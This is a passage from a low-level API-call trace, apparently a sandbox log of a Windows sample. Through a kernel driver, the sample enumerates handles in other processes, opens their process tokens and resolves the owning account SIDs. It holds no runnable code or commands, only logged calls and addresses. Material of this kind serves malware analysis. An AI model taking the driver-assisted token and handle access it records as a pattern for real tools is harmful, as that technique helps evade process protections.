ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a8044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.310] ObfDereferenceObject (Object=0xfffffa800210d2b0) returned 0x1 [0158.310] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.310] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.310] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.310] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0158.310] PsLookupProcessByProcessId (in: ProcessId=0x954, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.310] PsAcquireProcessExitSynchronization () returned 0x0 [0158.310] KeStackAttachProcess (in: PROCESS=0xfffffa8002108790, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002108790, ApcState=0xfffff880051635d0) [0158.310] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800210bd00, HandleInformation=0x0) returned 0x0 [0158.310] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.310] PsReleaseProcessExitSynchronization () returned 0x2 [0158.310] ObfDereferenceObject (Object=0xfffffa8002108790) returned 0x12 [0158.311] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa8044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.311] ObfDereferenceObject (Object=0xfffffa800210bd00) returned 0x1 [0158.311] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.311] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.311] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.311] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.311] PsLookupProcessByProcessId (in: ProcessId=0x954, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.311] PsAcquireProcessExitSynchronization () returned 0x0 [0158.311] KeStackAttachProcess (in: PROCESS=0xfffffa8002108790, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002108790, ApcState=0xfffff880051635d0) [0158.311] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0158.312] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.312] PsReleaseProcessExitSynchronization () returned 0x2 [0158.312] ObfDereferenceObject (Object=0xfffffa8002108790) returned 0x12 [0158.312] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003206044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003206044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.312] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0158.312] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.312] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x964) returned 0xc8 [0158.312] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0158.312] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002119b30, HandleInformation=0x0) returned 0x0 [0158.312] ObOpenObjectByPointer (in: Object=0xfffffa8002119b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0158.313] ObfDereferenceObject (Object=0xfffffa8002119b30) returned 0x14 [0158.313] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8003a14cc0 | out: TokenHandle=0xfffffa8003a14cc0*=0xc4) returned 0x0 [0158.313] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0158.313] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.313] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0158.313] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0158.707] CloseHandle (hObject=0xc4) returned 1 [0158.707] CloseHandle (hObject=0xc8) returned 1 [0158.707] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.707] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0158.707] PsLookupProcessByProcessId (in: ProcessId=0x964, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.707] PsAcquireProcessExitSynchronization () returned 0x0 [0158.707] KeStackAttachProcess (in: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880051635d0) [0158.707] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002103800, HandleInformation=0x0) returned 0x0 [0158.708] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.708] PsReleaseProcessExitSynchronization () returned 0x2 [0158.708] ObfDereferenceObject (Object=0xfffffa8002119b30) returned 0x12 [0158.708] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800302e584, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800302e584, ReturnLength=0xfffff88005163508) returned 0x0 [0158.708] ObfDereferenceObject (Object=0xfffffa8002103800) returned 0x1 [0158.708] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.708] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.708] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.708] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0158.708] PsLookupProcessByProcessId (in: ProcessId=0x964, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.708] PsAcquireProcessExitSynchronization () returned 0x0 [0158.708] KeStackAttachProcess (in: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880051635d0) [0158.708] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002119250, HandleInformation=0x0) returned 0x0 [0158.708] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.709] PsReleaseProcessExitSynchronization () returned 0x2 [0158.709] ObfDereferenceObject (Object=0xfffffa8002119b30) returned 0x12 [0158.709] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003206044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003206044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.709] ObfDereferenceObject (Object=0xfffffa8002119250) returned 0x1 [0158.709] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.709] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.709] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.709] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.709] PsLookupProcessByProcessId (in: ProcessId=0x964, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.709] PsAcquireProcessExitSynchronization () returned 0x0 [0158.709] KeStackAttachProcess (in: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880051635d0) [0158.709] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0158.709] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.709] PsReleaseProcessExitSynchronization () returned 0x2 [0158.710] ObfDereferenceObject (Object=0xfffffa8002119b30) returned 0x12 [0158.710] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030c9044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c9044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.710] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0158.710] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.710] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x974) returned 0xc8 [0158.710] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0158.710] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002123060, HandleInformation=0x0) returned 0x0 [0158.710] ObOpenObjectByPointer (in: Object=0xfffffa8002123060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0158.710] ObfDereferenceObject (Object=0xfffffa8002123060) returned 0x14 [0158.710] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8002845180 | out: TokenHandle=0xfffffa8002845180*=0xc4) returned 0x0 [0158.710] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0158.711] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.711] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0158.711] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0158.713] CloseHandle (hObject=0xc4) returned 1 [0158.713] CloseHandle (hObject=0xc8) returned 1 [0158.714] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.714] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0158.714] PsLookupProcessByProcessId (in: ProcessId=0x974, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.714] PsAcquireProcessExitSynchronization () returned 0x0 [0158.714] KeStackAttachProcess (in: PROCESS=0xfffffa8002123060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002123060, ApcState=0xfffff880051635d0) [0158.714] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020e7840, HandleInformation=0x0) returned 0x0 [0158.714] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.714] PsReleaseProcessExitSynchronization () returned 0x2 [0158.714] ObfDereferenceObject (Object=0xfffffa8002123060) returned 0x12 [0158.714] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa8044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.714] ObfDereferenceObject (Object=0xfffffa80020e7840) returned 0x1 [0158.714] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.715] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.715] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.715] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0158.715] PsLookupProcessByProcessId (in: ProcessId=0x974, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.715] PsAcquireProcessExitSynchronization () returned 0x0 [0158.715] KeStackAttachProcess (in: PROCESS=0xfffffa8002123060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002123060, ApcState=0xfffff880051635d0) [0158.715] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ffadd0, HandleInformation=0x0) returned 0x0 [0158.715] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.715] PsReleaseProcessExitSynchronization () returned 0x2 [0158.715] ObfDereferenceObject (Object=0xfffffa8002123060) returned 0x12 [0158.715] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030ab044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030ab044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.715] ObfDereferenceObject (Object=0xfffffa8001ffadd0) returned 0x1 [0158.715] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.716] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.716] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.716] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.716] PsLookupProcessByProcessId (in: ProcessId=0x974, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.716] PsAcquireProcessExitSynchronization () returned 0x0 [0158.716] KeStackAttachProcess (in: PROCESS=0xfffffa8002123060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002123060, ApcState=0xfffff880051635d0) [0158.716] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0158.716] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.716] PsReleaseProcessExitSynchronization () returned 0x2 [0158.716] ObfDereferenceObject (Object=0xfffffa8002123060) returned 0x12 [0158.716] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003003044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003003044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.716] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0158.716] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.716] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x984) returned 0xc8 [0158.717] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0158.717] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002133b30, HandleInformation=0x0) returned 0x0 [0158.717] ObOpenObjectByPointer (in: Object=0xfffffa8002133b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0158.717] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x14 [0158.717] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8002845180 | out: TokenHandle=0xfffffa8002845180*=0xc4) returned 0x0 [0158.717] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0158.717] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.717] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0158.717] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0158.719] CloseHandle (hObject=0xc4) returned 1 [0158.719] CloseHandle (hObject=0xc8) returned 1 [0158.719] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.719] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0158.719] PsLookupProcessByProcessId (in: ProcessId=0x984, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.719] PsAcquireProcessExitSynchronization () returned 0x0 [0158.719] KeStackAttachProcess (in: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880051635d0) [0158.719] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800212b860, HandleInformation=0x0) returned 0x0 [0158.720] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.720] PsReleaseProcessExitSynchronization () returned 0x2 [0158.720] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x12 [0158.720] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c1044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c1044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.720] ObfDereferenceObject (Object=0xfffffa800212b860) returned 0x1 [0158.720] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.720] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.720] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.720] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0158.720] PsLookupProcessByProcessId (in: ProcessId=0x984, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.720] PsAcquireProcessExitSynchronization () returned 0x0 [0158.720] KeStackAttachProcess (in: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880051635d0) [0158.720] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002131600, HandleInformation=0x0) returned 0x0 [0158.720] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.720] PsReleaseProcessExitSynchronization () returned 0x2 [0158.720] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x12 [0158.720] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003205044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003205044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.721] ObfDereferenceObject (Object=0xfffffa8002131600) returned 0x1 [0158.721] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.721] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.721] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.721] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.721] PsLookupProcessByProcessId (in: ProcessId=0x984, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.721] PsAcquireProcessExitSynchronization () returned 0x0 [0158.721] KeStackAttachProcess (in: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002133b30, ApcState=0xfffff880051635d0) [0158.721] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0158.721] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.721] PsReleaseProcessExitSynchronization () returned 0x2 [0158.721] ObfDereferenceObject (Object=0xfffffa8002133b30) returned 0x12 [0158.721] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030d8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030d8044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.722] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0158.722] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.722] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.722] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.722] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0158.722] PsLookupProcessByProcessId (in: ProcessId=0x984, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.722] 